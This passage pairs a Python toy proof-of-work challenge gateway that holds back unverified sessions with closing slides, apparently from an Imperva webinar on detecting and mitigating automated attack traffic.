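    latency imposed on the client."""
    counter = 0
    while leading_zero_bits(pow_digest(nonce, counter)) < bits:
        counter += 1
    return counter


def verify(nonce: bytes, counter: int, bits: int) -> bool:
    """Server side: one hash, whatever the difficulty."""
    return leading_zero_bits(pow_digest(nonce, counter)) >= bits


class Gateway:
    """Toy application gateway: requests in an unvalidated session are held
    back and answered with a challenge until the session solves one."""

    def __init__(self, bits: int = 16):
        self.bits = bits
        self.pending = {}       # session id -> nonce issued (single use)
        self.validated = set()  # session ids that solved a challenge

    def handle(self, session_id: str, answer: Optional[int] = None):
        if session_id in self.validated:
            return "pass", None
        nonce = self.pending.get(session_id)
        if nonce is not None and answer is not None and verify(nonce, answer, self.bits):
            del self.pending[session_id]          # nonce is consumed; no replay
            self.validated.add(session_id)
            return "pass", None
        # No valid answer yet: (re)issue a fresh random nonce and hold the request.
        nonce = os.urandom(16)
        self.pending[session_id] = nonce
        return "challenge", nonce


def run_exchange(bits: int = 16):
    """Two clients against one gateway: a browser-like client that solves the
    challenge and a script that never answers it. Returns both decision traces."""
    gw = Gateway(bits)
    cooperative, ignoring = [], []

    status, nonce = gw.handle("browser-session")                  # first request: challenged
    cooperative.append(status)
    status, _ = gw.handle("browser-session", solve(nonce, bits))  # correct answer: validated
    cooperative.append(status)
    status, _ = gw.handle("browser-session")                      # later requests pass freely
    cooperative.append(status)

    for _ in range(3):                                            # the script never answers
        status, _ = gw.handle("script-session")
        ignoring.append(status)
    return cooperative, ignoring


if __name__ == "__main__":
    print(run_exchange())
```

The asymmetry is the point of the technique: the client spends on the order of 2**bits hashes per session, the gateway spends one, and raising `bits` meters the client without adding server load. Because each nonce is random and consumed on use, an answer cannot be replayed into another session. In a real deployment the challenge would be delivered as script in the response so that only a JavaScript-capable user agent can complete it, and the pending nonces would carry an expiry.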
  • 33. Mitigation (cont.)
     Introduce CAPTCHA or other test to tell apart a human operator from a script
  • 34. Summary
     Automation is ruling the threat landscape
      + It accounts for the lion’s share of attack traffic
     Automation is used in various forms
      + In depth scanning / attack of a single target
      + Wide breadth scanning / attack of multiple applications
      + Distributed scanning / attack of single / multiple applications
  • 35. Summary (cont.)
     Detection and mitigation are essential for reducing noise and focusing resources on the most complex attacks
     Detection and mitigation are most effectively deployed outside of the application
     Detection and mitigation must include a combination of passive and active measures
     Detection and mitigation are best utilized within a community that can generate reputation data
  • 36. Webinar Materials
    Join Our LinkedIn Group, Imperva Data Security Direct for…
      Answers to Attendee Questions
      Post-Webinar Discussions
      Webinar Slides
      Webinar Recording Link